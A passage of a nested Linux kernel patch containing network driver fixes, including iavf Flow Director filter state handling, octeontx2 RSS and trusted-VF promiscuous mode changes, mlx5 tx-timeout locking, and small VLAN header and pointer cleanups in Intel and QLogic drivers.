+ 		return -EOPNOTSUPP;
+ 
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+@@ -1474,6 +1478,11 @@ static int iavf_del_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 		if (fltr->state == IAVF_FDIR_FLTR_ACTIVE) {
+ 			fltr->state = IAVF_FDIR_FLTR_DEL_REQUEST;
+ 			adapter->aq_required |= IAVF_FLAG_AQ_DEL_FDIR_FILTER;
++		} else if (fltr->state == IAVF_FDIR_FLTR_INACTIVE) {
++			list_del(&fltr->list);
++			kfree(fltr);
++			adapter->fdir_active_fltr--;
++			fltr = NULL;
+ 		} else {
+ 			err = -EBUSY;
+ 		}
+@@ -1782,7 +1791,7 @@ static int iavf_get_rxnfc(struct net_device *netdev, struct ethtool_rxnfc *cmd,
+ 		ret = 0;
+ 		break;
+ 	case ETHTOOL_GRXCLSRLCNT:
+-		if (!FDIR_FLTR_SUPPORT(adapter))
++		if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 			break;
+ 		spin_lock_bh(&adapter->fdir_fltr_lock);
+ 		cmd->rule_cnt = adapter->fdir_active_fltr;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.h b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+index 9eb9f73f6adf3..d31bd923ba8cb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+@@ -6,12 +6,25 @@
+ 
+ struct iavf_adapter;
+ 
+-/* State of Flow Director filter */
++/* State of Flow Director filter
++ *
++ * *_REQUEST states are used to mark filter to be sent to PF driver to perform
++ * an action (either add or delete filter). *_PENDING states are an indication
++ * that request was sent to PF and the driver is waiting for response.
++ *
++ * Both DELETE and DISABLE states are being used to delete a filter in PF.
++ * The difference is that after a successful response filter in DEL_PENDING
++ * state is being deleted from VF driver as well and filter in DIS_PENDING state
++ * is being changed to INACTIVE state.
++ */
+ enum iavf_fdir_fltr_state_t {
+ 	IAVF_FDIR_FLTR_ADD_REQUEST,	/* User requests to add filter */
+ 	IAVF_FDIR_FLTR_ADD_PENDING,	/* Filter pending add by the PF */
+ 	IAVF_FDIR_FLTR_DEL_REQUEST,	/* User requests to delete filter */
+ 	IAVF_FDIR_FLTR_DEL_PENDING,	/* Filter pending delete by the PF */
++	IAVF_FDIR_FLTR_DIS_REQUEST,	/* Filter scheduled to be disabled */
++	IAVF_FDIR_FLTR_DIS_PENDING,	/* Filter pending disable by the PF */
++	IAVF_FDIR_FLTR_INACTIVE,	/* Filter inactive on link down */
+ 	IAVF_FDIR_FLTR_ACTIVE,		/* Filter is active */
+ };
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 4836bac2bd09d..b9c4b311cd625 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -1368,18 +1368,20 @@ static void iavf_clear_cloud_filters(struct iavf_adapter *adapter)
+  **/
+ static void iavf_clear_fdir_filters(struct iavf_adapter *adapter)
+ {
+-	struct iavf_fdir_fltr *fdir, *fdirtmp;
++	struct iavf_fdir_fltr *fdir;
+ 
+ 	/* remove all Flow Director filters */
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+-	list_for_each_entry_safe(fdir, fdirtmp, &adapter->fdir_list_head,
+-				 list) {
++	list_for_each_entry(fdir, &adapter->fdir_list_head, list) {
+ 		if (fdir->state == IAVF_FDIR_FLTR_ADD_REQUEST) {
+-			list_del(&fdir->list);
+-			kfree(fdir);
+-			adapter->fdir_active_fltr--;
+-		} else {
+-			fdir->state = IAVF_FDIR_FLTR_DEL_REQUEST;
++			/* Cancel a request, keep filter as inactive */
++			fdir->state = IAVF_FDIR_FLTR_INACTIVE;
++		} else if (fdir->state == IAVF_FDIR_FLTR_ADD_PENDING ||
++			 fdir->state == IAVF_FDIR_FLTR_ACTIVE) {
++			/* Disable filters which are active or have a pending
++			 * request to PF to be added
++			 */
++			fdir->state = IAVF_FDIR_FLTR_DIS_REQUEST;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+@@ -4210,6 +4212,33 @@ static int iavf_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 	}
+ }
+ 
++/**
++ * iavf_restore_fdir_filters
++ * @adapter: board private structure
++ *
++ * Restore existing FDIR filters when VF netdev comes back up.
++ **/
++static void iavf_restore_fdir_filters(struct iavf_adapter *adapter)
++{
++	struct iavf_fdir_fltr *f;
++
++	spin_lock_bh(&adapter->fdir_fltr_lock);
++	list_for_each_entry(f, &adapter->fdir_list_head, list) {
++		if (f->state == IAVF_FDIR_FLTR_DIS_REQUEST) {
++			/* Cancel a request, keep filter as active */
++			f->state = IAVF_FDIR_FLTR_ACTIVE;
++		} else if (f->state == IAVF_FDIR_FLTR_DIS_PENDING ||
++			   f->state == IAVF_FDIR_FLTR_INACTIVE) {
++			/* Add filters which are inactive or have a pending
++			 * request to PF to be deleted
++			 */
++			f->state = IAVF_FDIR_FLTR_ADD_REQUEST;
++			adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++		}
++	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
++}
++
+ /**
+  * iavf_open - Called when a network interface is made active
+  * @netdev: network interface device structure
+@@ -4277,8 +4306,9 @@ static int iavf_open(struct net_device *netdev)
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	/* Restore VLAN filters that were removed with IFF_DOWN */
++	/* Restore filters that were removed with IFF_DOWN */
+ 	iavf_restore_filters(adapter);
++	iavf_restore_fdir_filters(adapter);
+ 
+ 	iavf_configure(adapter);
+ 
+@@ -4415,6 +4445,49 @@ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ 	return ret;
+ }
+ 
++/**
++ * iavf_disable_fdir - disable Flow Director and clear existing filters
++ * @adapter: board private structure
++ **/
++static void iavf_disable_fdir(struct iavf_adapter *adapter)
++{
++	struct iavf_fdir_fltr *fdir, *fdirtmp;
++	bool del_filters = false;
++
++	adapter->flags &= ~IAVF_FLAG_FDIR_ENABLED;
++
++	/* remove all Flow Director filters */
++	spin_lock_bh(&adapter->fdir_fltr_lock);
++	list_for_each_entry_safe(fdir, fdirtmp, &adapter->fdir_list_head,
++				 list) {
++		if (fdir->state == IAVF_FDIR_FLTR_ADD_REQUEST ||
++		    fdir->state == IAVF_FDIR_FLTR_INACTIVE) {
++			/* Delete filters not registered in PF */
++			list_del(&fdir->list);
++			kfree(fdir);
++			adapter->fdir_active_fltr--;
++		} else if (fdir->state == IAVF_FDIR_FLTR_ADD_PENDING ||
++			   fdir->state == IAVF_FDIR_FLTR_DIS_REQUEST ||
++			   fdir->state == IAVF_FDIR_FLTR_ACTIVE) {
++			/* Filters registered in PF, schedule their deletion */
++			fdir->state = IAVF_FDIR_FLTR_DEL_REQUEST;
++			del_filters = true;
++		} else if (fdir->state == IAVF_FDIR_FLTR_DIS_PENDING) {
++			/* Request to delete filter already sent to PF, change
++			 * state to DEL_PENDING to delete filter after PF's
++			 * response, not set as INACTIVE
++			 */
++			fdir->state = IAVF_FDIR_FLTR_DEL_PENDING;
++		}
++	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
++
++	if (del_filters) {
++		adapter->aq_required |= IAVF_FLAG_AQ_DEL_FDIR_FILTER;
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
++	}
++}
++
+ #define NETIF_VLAN_OFFLOAD_FEATURES	(NETIF_F_HW_VLAN_CTAG_RX | \
+ 					 NETIF_F_HW_VLAN_CTAG_TX | \
+ 					 NETIF_F_HW_VLAN_STAG_RX | \
+@@ -4437,6 +4510,13 @@ static int iavf_set_features(struct net_device *netdev,
+ 		iavf_set_vlan_offload_features(adapter, netdev->features,
+ 					       features);
+ 
++	if ((netdev->features & NETIF_F_NTUPLE) ^ (features & NETIF_F_NTUPLE)) {
++		if (features & NETIF_F_NTUPLE)
++			adapter->flags |= IAVF_FLAG_FDIR_ENABLED;
++		else
++			iavf_disable_fdir(adapter);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -4732,6 +4812,9 @@ static netdev_features_t iavf_fix_features(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	if (!FDIR_FLTR_SUPPORT(adapter))
++		features &= ~NETIF_F_NTUPLE;
++
+ 	return iavf_fix_netdev_vlan_features(adapter, features);
+ }
+ 
+@@ -4849,6 +4932,12 @@ int iavf_process_config(struct iavf_adapter *adapter)
+ 	if (vfres->vf_cap_flags & VIRTCHNL_VF_OFFLOAD_VLAN)
+ 		netdev->features |= NETIF_F_HW_VLAN_CTAG_FILTER;
+ 
++	if (FDIR_FLTR_SUPPORT(adapter)) {
++		netdev->hw_features |= NETIF_F_NTUPLE;
++		netdev->features |= NETIF_F_NTUPLE;
++		adapter->flags |= IAVF_FLAG_FDIR_ENABLED;
++	}
++
+ 	netdev->priv_flags |= IFF_UNICAST_FLT;
+ 
+ 	/* Do not turn on offloads when they are requested to be turned off.
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 5a66b05c03222..951ef350323a2 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -1752,8 +1752,8 @@ void iavf_add_fdir_filter(struct iavf_adapter *adapter)
+  **/
+ void iavf_del_fdir_filter(struct iavf_adapter *adapter)
+ {
++	struct virtchnl_fdir_del f = {};
+ 	struct iavf_fdir_fltr *fdir;
+-	struct virtchnl_fdir_del f;
+ 	bool process_fltr = false;
+ 	int len;
+ 
+@@ -1770,11 +1770,16 @@ void iavf_del_fdir_filter(struct iavf_adapter *adapter)
+ 	list_for_each_entry(fdir, &adapter->fdir_list_head, list) {
+ 		if (fdir->state == IAVF_FDIR_FLTR_DEL_REQUEST) {
+ 			process_fltr = true;
+-			memset(&f, 0, len);
+ 			f.vsi_id = fdir->vc_add_msg.vsi_id;
+ 			f.flow_id = fdir->flow_id;
+ 			fdir->state = IAVF_FDIR_FLTR_DEL_PENDING;
+ 			break;
++		} else if (fdir->state == IAVF_FDIR_FLTR_DIS_REQUEST) {
++			process_fltr = true;
++			f.vsi_id = fdir->vc_add_msg.vsi_id;
++			f.flow_id = fdir->flow_id;
++			fdir->state = IAVF_FDIR_FLTR_DIS_PENDING;
++			break;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+@@ -1918,6 +1923,48 @@ static void iavf_netdev_features_vlan_strip_set(struct net_device *netdev,
+ 		netdev->features &= ~NETIF_F_HW_VLAN_CTAG_RX;
+ }
+ 
++/**
++ * iavf_activate_fdir_filters - Reactivate all FDIR filters after a reset
++ * @adapter: private adapter structure
++ *
++ * Called after a reset to re-add all FDIR filters and delete some of them
++ * if they were pending to be deleted.
++ */
++static void iavf_activate_fdir_filters(struct iavf_adapter *adapter)
++{
++	struct iavf_fdir_fltr *f, *ftmp;
++	bool add_filters = false;
++
++	spin_lock_bh(&adapter->fdir_fltr_lock);
++	list_for_each_entry_safe(f, ftmp, &adapter->fdir_list_head, list) {
++		if (f->state == IAVF_FDIR_FLTR_ADD_REQUEST ||
++		    f->state == IAVF_FDIR_FLTR_ADD_PENDING ||
++		    f->state == IAVF_FDIR_FLTR_ACTIVE) {
++			/* All filters and requests have been removed in PF,
++			 * restore them
++			 */
++			f->state = IAVF_FDIR_FLTR_ADD_REQUEST;
++			add_filters = true;
++		} else if (f->state == IAVF_FDIR_FLTR_DIS_REQUEST ||
++			   f->state == IAVF_FDIR_FLTR_DIS_PENDING) {
++			/* Link down state, leave filters as inactive */
++			f->state = IAVF_FDIR_FLTR_INACTIVE;
++		} else if (f->state == IAVF_FDIR_FLTR_DEL_REQUEST ||
++			   f->state == IAVF_FDIR_FLTR_DEL_PENDING) {
++			/* Delete filters that were pending to be deleted, the
++			 * list on PF is already cleared after a reset
++			 */
++			list_del(&f->list);
++			kfree(f);
++			adapter->fdir_active_fltr--;
++		}
++	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
++
++	if (add_filters)
++		adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++}
++
+ /**
+  * iavf_virtchnl_completion
+  * @adapter: adapter structure
+@@ -2095,7 +2142,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 			spin_lock_bh(&adapter->fdir_fltr_lock);
+ 			list_for_each_entry(fdir, &adapter->fdir_list_head,
+ 					    list) {
+-				if (fdir->state == IAVF_FDIR_FLTR_DEL_PENDING) {
++				if (fdir->state == IAVF_FDIR_FLTR_DEL_PENDING ||
++				    fdir->state == IAVF_FDIR_FLTR_DIS_PENDING) {
+ 					fdir->state = IAVF_FDIR_FLTR_ACTIVE;
+ 					dev_info(&adapter->pdev->dev, "Failed to del Flow Director filter, error %s\n",
+ 						 iavf_stat_str(&adapter->hw,
+@@ -2232,6 +2280,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
++		iavf_activate_fdir_filters(adapter);
++
+ 		iavf_parse_vf_resource_msg(adapter);
+ 
+ 		/* negotiated VIRTCHNL_VF_OFFLOAD_VLAN_V2, so wait for the
+@@ -2421,7 +2471,9 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		list_for_each_entry_safe(fdir, fdir_tmp, &adapter->fdir_list_head,
+ 					 list) {
+ 			if (fdir->state == IAVF_FDIR_FLTR_DEL_PENDING) {
+-				if (del_fltr->status == VIRTCHNL_FDIR_SUCCESS) {
++				if (del_fltr->status == VIRTCHNL_FDIR_SUCCESS ||
++				    del_fltr->status ==
++				    VIRTCHNL_FDIR_FAILURE_RULE_NONEXIST) {
+ 					dev_info(&adapter->pdev->dev, "Flow Director filter with location %u is deleted\n",
+ 						 fdir->loc);
+ 					list_del(&fdir->list);
+@@ -2433,6 +2485,17 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 						 del_fltr->status);
+ 					iavf_print_fdir_fltr(adapter, fdir);
+ 				}
++			} else if (fdir->state == IAVF_FDIR_FLTR_DIS_PENDING) {
++				if (del_fltr->status == VIRTCHNL_FDIR_SUCCESS ||
++				    del_fltr->status ==
++				    VIRTCHNL_FDIR_FAILURE_RULE_NONEXIST) {
++					fdir->state = IAVF_FDIR_FLTR_INACTIVE;
++				} else {
++					fdir->state = IAVF_FDIR_FLTR_ACTIVE;
++					dev_info(&adapter->pdev->dev, "Failed to disable Flow Director filter with status: %d\n",
++						 del_fltr->status);
++					iavf_print_fdir_fltr(adapter, fdir);
++				}
+ 			}
+ 		}
+ 		spin_unlock_bh(&adapter->fdir_fltr_lock);
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 6105419ae2d5f..9e0e13638c463 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -8822,7 +8822,7 @@ netdev_tx_t ixgbe_xmit_frame_ring(struct sk_buff *skb,
+ 
+ 			if (skb_cow_head(skb, 0))
+ 				goto out_drop;
+-			vhdr = (struct vlan_ethhdr *)skb->data;
++			vhdr = skb_vlan_eth_hdr(skb);
+ 			vhdr->h_vlan_TCI = htons(tx_flags >>
+ 						 IXGBE_TX_FLAGS_VLAN_SHIFT);
+ 		} else {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+index d609512998992..b9a4efb955333 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+@@ -642,7 +642,7 @@ static int rvu_nix_register_reporters(struct rvu_devlink *rvu_dl)
+ 
+ 	rvu_dl->devlink_wq = create_workqueue("rvu_devlink_wq");
+ 	if (!rvu_dl->devlink_wq)
+-		goto err;
++		return -ENOMEM;
+ 
+ 	INIT_WORK(&rvu_reporters->intr_work, rvu_nix_intr_work);
+ 	INIT_WORK(&rvu_reporters->gen_work, rvu_nix_gen_work);
+@@ -650,9 +650,6 @@ static int rvu_nix_register_reporters(struct rvu_devlink *rvu_dl)
+ 	INIT_WORK(&rvu_reporters->ras_work, rvu_nix_ras_work);
+ 
+ 	return 0;
+-err:
+-	rvu_nix_health_reporters_destroy(rvu_dl);
+-	return -ENOMEM;
+ }
+ 
+ static int rvu_nix_health_reporters_create(struct rvu_devlink *rvu_dl)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index f65805860c8d4..0bcf3e5592806 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -671,6 +671,7 @@ void rvu_npc_install_promisc_entry(struct rvu *rvu, u16 pcifunc,
+ 	int blkaddr, ucast_idx, index;
+ 	struct nix_rx_action action = { 0 };
+ 	u64 relaxed_mask;
++	u8 flow_key_alg;
+ 
+ 	if (!hw->cap.nix_rx_multicast && is_cgx_vf(rvu, pcifunc))
+ 		return;
+@@ -701,6 +702,8 @@ void rvu_npc_install_promisc_entry(struct rvu *rvu, u16 pcifunc,
+ 		action.op = NIX_RX_ACTIONOP_UCAST;
+ 	}
+ 
++	flow_key_alg = action.flow_key_alg;
++
+ 	/* RX_ACTION set to MCAST for CGX PF's */
+ 	if (hw->cap.nix_rx_multicast && pfvf->use_mce_list &&
+ 	    is_pf_cgxmapped(rvu, rvu_get_pf(pcifunc))) {
+@@ -740,7 +743,7 @@ void rvu_npc_install_promisc_entry(struct rvu *rvu, u16 pcifunc,
+ 	req.vf = pcifunc;
+ 	req.index = action.index;
+ 	req.match_id = action.match_id;
+-	req.flow_key_alg = action.flow_key_alg;
++	req.flow_key_alg = flow_key_alg;
+ 
+ 	rvu_mbox_handler_npc_install_flow(rvu, &req, &rsp);
+ }
+@@ -854,6 +857,7 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	u8 mac_addr[ETH_ALEN] = { 0 };
+ 	struct nix_rx_action action = { 0 };
+ 	struct rvu_pfvf *pfvf;
++	u8 flow_key_alg;
+ 	u16 vf_func;
+ 
+ 	/* Only CGX PF/VF can add allmulticast entry */
+@@ -888,6 +892,7 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 		*(u64 *)&action = npc_get_mcam_action(rvu, mcam,
+ 							blkaddr, ucast_idx);
+ 
++	flow_key_alg = action.flow_key_alg;
+ 	if (action.op != NIX_RX_ACTIONOP_RSS) {
+ 		*(u64 *)&action = 0;
+ 		action.op = NIX_RX_ACTIONOP_UCAST;
+@@ -924,7 +929,7 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	req.vf = pcifunc | vf_func;
+ 	req.index = action.index;
+ 	req.match_id = action.match_id;
+-	req.flow_key_alg = action.flow_key_alg;
++	req.flow_key_alg = flow_key_alg;
+ 
+ 	rvu_mbox_handler_npc_install_flow(rvu, &req, &rsp);
+ }
+@@ -990,11 +995,38 @@ static void npc_update_vf_flow_entry(struct rvu *rvu, struct npc_mcam *mcam,
+ 	mutex_unlock(&mcam->lock);
+ }
+ 
++static void npc_update_rx_action_with_alg_idx(struct rvu *rvu, struct nix_rx_action action,
++					      struct rvu_pfvf *pfvf, int mcam_index, int blkaddr,
++					      int alg_idx)
++
++{
++	struct npc_mcam *mcam = &rvu->hw->mcam;
++	struct rvu_hwinfo *hw = rvu->hw;
++	int bank, op_rss;
++
++	if (!is_mcam_entry_enabled(rvu, mcam, blkaddr, mcam_index))
++		return;
++
++	op_rss = (!hw->cap.nix_rx_multicast || !pfvf->use_mce_list);
++
++	bank = npc_get_bank(mcam, mcam_index);
++	mcam_index &= (mcam->banksize - 1);
++
++	/* If Rx action is MCAST update only RSS algorithm index */
++	if (!op_rss) {
++		*(u64 *)&action = rvu_read64(rvu, blkaddr,
++				NPC_AF_MCAMEX_BANKX_ACTION(mcam_index, bank));
++
++		action.flow_key_alg = alg_idx;
++	}
++	rvu_write64(rvu, blkaddr,
++		    NPC_AF_MCAMEX_BANKX_ACTION(mcam_index, bank), *(u64 *)&action);
++}
++
+ void rvu_npc_update_flowkey_alg_idx(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 				    int group, int alg_idx, int mcam_index)
+ {
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+-	struct rvu_hwinfo *hw = rvu->hw;
+ 	struct nix_rx_action action;
+ 	int blkaddr, index, bank;
+ 	struct rvu_pfvf *pfvf;
+@@ -1050,15 +1082,16 @@ void rvu_npc_update_flowkey_alg_idx(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	/* If PF's promiscuous entry is enabled,
+ 	 * Set RSS action for that entry as well
+ 	 */
+-	if ((!hw->cap.nix_rx_multicast || !pfvf->use_mce_list) &&
+-	    is_mcam_entry_enabled(rvu, mcam, blkaddr, index)) {
+-		bank = npc_get_bank(mcam, index);
+-		index &= (mcam->banksize - 1);
++	npc_update_rx_action_with_alg_idx(rvu, action, pfvf, index, blkaddr,
++					  alg_idx);
+ 
+-		rvu_write64(rvu, blkaddr,
+-			    NPC_AF_MCAMEX_BANKX_ACTION(index, bank),
+-			    *(u64 *)&action);
+-	}
++	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
++					 nixlf, NIXLF_ALLMULTI_ENTRY);
++	/* If PF's allmulti  entry is enabled,
++	 * Set RSS action for that entry as well
++	 */
++	npc_update_rx_action_with_alg_idx(rvu, action, pfvf, index, blkaddr,
++					  alg_idx);
+ }
+ 
+ void npc_enadis_default_mce_entry(struct rvu *rvu, u16 pcifunc,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 55807e2043edf..a2d8ac6204054 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1638,6 +1638,21 @@ static void otx2_free_hw_resources(struct otx2_nic *pf)
+ 	mutex_unlock(&mbox->lock);
+ }
+ 
++static bool otx2_promisc_use_mce_list(struct otx2_nic *pfvf)
++{
++	int vf;
++
++	/* The AF driver will determine whether to allow the VF netdev or not */
++	if (is_otx2_vf(pfvf->pcifunc))
++		return true;
++
++	/* check if there are any trusted VFs associated with the PF netdev */
++	for (vf = 0; vf < pci_num_vf(pfvf->pdev); vf++)
++		if (pfvf->vf_configs[vf].trusted)
++			return true;
++	return false;
++}
++
+ static void otx2_do_set_rx_mode(struct otx2_nic *pf)
+ {
+ 	struct net_device *netdev = pf->netdev;
+@@ -1670,7 +1685,8 @@ static void otx2_do_set_rx_mode(struct otx2_nic *pf)
+ 	if (netdev->flags & (IFF_ALLMULTI | IFF_MULTICAST))
+ 		req->mode |= NIX_RX_MODE_ALLMULTI;
+ 
+-	req->mode |= NIX_RX_MODE_USE_MCE;
++	if (otx2_promisc_use_mce_list(pf))
++		req->mode |= NIX_RX_MODE_USE_MCE;
+ 
+ 	otx2_sync_mbox_msg(&pf->mbox);
+ 	mutex_unlock(&pf->mbox.lock);
+@@ -2634,11 +2650,14 @@ static int otx2_ndo_set_vf_trust(struct net_device *netdev, int vf,
+ 	pf->vf_configs[vf].trusted = enable;
+ 	rc = otx2_set_vf_permissions(pf, vf, OTX2_TRUSTED_VF);
+ 
+-	if (rc)
++	if (rc) {
+ 		pf->vf_configs[vf].trusted = !enable;
+-	else
++	} else {
+ 		netdev_info(pf->netdev, "VF %d is %strusted\n",
+ 			    vf, enable ? "" : "not ");
++		otx2_set_rx_mode(netdev);
++	}
++
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+index bc76fe6b06230..0ee456480a488 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+@@ -847,6 +847,7 @@ enum {
+ 	MLX5E_STATE_DESTROYING,
+ 	MLX5E_STATE_XDP_TX_ENABLED,
+ 	MLX5E_STATE_XDP_ACTIVE,
++	MLX5E_STATE_CHANNELS_ACTIVE,
+ };
+ 
+ struct mlx5e_modify_sq_param {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 42e6f2fcf5f59..9910a0480f589 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -2586,6 +2586,7 @@ void mlx5e_close_channels(struct mlx5e_channels *chs)
+ {
+ 	int i;
+ 
++	ASSERT_RTNL();
+ 	if (chs->ptp) {
+ 		mlx5e_ptp_close(chs->ptp);
+ 		chs->ptp = NULL;
+@@ -2865,17 +2866,29 @@ void mlx5e_activate_priv_channels(struct mlx5e_priv *priv)
+ 	if (mlx5e_is_vport_rep(priv))
+ 		mlx5e_rep_activate_channels(priv);
+ 
++	set_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state);
++
+ 	mlx5e_wait_channels_min_rx_wqes(&priv->channels);
+ 
+ 	if (priv->rx_res)
+ 		mlx5e_rx_res_channels_activate(priv->rx_res, &priv->channels);
+ }
+ 
++static void mlx5e_cancel_tx_timeout_work(struct mlx5e_priv *priv)
++{
++	WARN_ON_ONCE(test_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state));
++	if (current_work() != &priv->tx_timeout_work)
++		cancel_work_sync(&priv->tx_timeout_work);
++}
++
+ void mlx5e_deactivate_priv_channels(struct mlx5e_priv *priv)
+ {
+ 	if (priv->rx_res)
+ 		mlx5e_rx_res_channels_deactivate(priv->rx_res);
+ 
++	clear_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state);
++	mlx5e_cancel_tx_timeout_work(priv);
++
+ 	if (mlx5e_is_vport_rep(priv))
+ 		mlx5e_rep_deactivate_channels(priv);
+ 
+@@ -4617,8 +4630,17 @@ static void mlx5e_tx_timeout_work(struct work_struct *work)
+ 	struct net_device *netdev = priv->netdev;
+ 	int i;
+ 
+-	rtnl_lock();
+-	mutex_lock(&priv->state_lock);
++	/* Take rtnl_lock to ensure no change in netdev->real_num_tx_queues
++	 * through this flow. However, channel closing flows have to wait for
++	 * this work to finish while holding rtnl lock too. So either get the
++	 * lock or find that channels are being closed for other reason and
++	 * this work is not relevant anymore.
++	 */
++	while (!rtnl_trylock()) {
++		if (!test_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state))
++			return;
++		msleep(20);
++	}
+ 
+ 	if (!test_bit(MLX5E_STATE_OPENED, &priv->state))
+ 		goto unlock;
+@@ -4637,7 +4659,6 @@ static void mlx5e_tx_timeout_work(struct work_struct *work)
+ 	}
+ 
+ unlock:
+-	mutex_unlock(&priv->state_lock);
+ 	rtnl_unlock();
+ }
+ 
+diff --git a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c
+index de8d54b23f738..c005a9df59d1c 100644
+--- a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c
++++ b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c
+@@ -1862,7 +1862,7 @@ netxen_tso_check(struct net_device *netdev,
+ 
+ 	if (protocol == cpu_to_be16(ETH_P_8021Q)) {
+ 
+-		vh = (struct vlan_ethhdr *)skb->data;
++		vh = skb_vlan_eth_hdr(skb);
+ 		protocol = vh->h_vlan_encapsulated_proto;
+ 		flags = FLAGS_VLAN_TAGGED;
+ 
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_cxt.c b/drivers/net/ethernet/qlogic/qed/qed_cxt.c
+index 65e20693c549e..33f4f58ee51c6 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_cxt.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_cxt.c
+@@ -933,6 +933,7 @@ static void qed_ilt_shadow_free(struct qed_hwfn *p_hwfn)
+ 		p_dma->virt_addr = NULL;
+ 	}
+ 	kfree(p_mngr->ilt_shadow);
++	p_mngr->ilt_shadow = NULL;
+ }
+ 
+ static int qed_ilt_blk_alloc(struct qed_hwfn *p_hwfn,
+diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c
+index 92930a055cbcc..41894d154013b 100644
+--- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c
++++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_io.c
+@@ -318,7 +318,7 @@ static void qlcnic_send_filter(struct qlcnic_adapter *adapter,
+ 
+ 	if (adapter->flags & QLCNIC_VLAN_FILTERING) {
+ 		if (protocol == ETH_P_8021Q) {
+-			vh = (struct vlan_ethhdr *)skb->data;
++			vh = skb_vlan_eth_hdr(skb);
+ 			vlan_id = ntohs(vh->h_vlan_TCI);
+ 		} else if (skb_vlan_tag_present(skb)) {
+ 			vlan_id = skb_vlan_tag_get(skb);
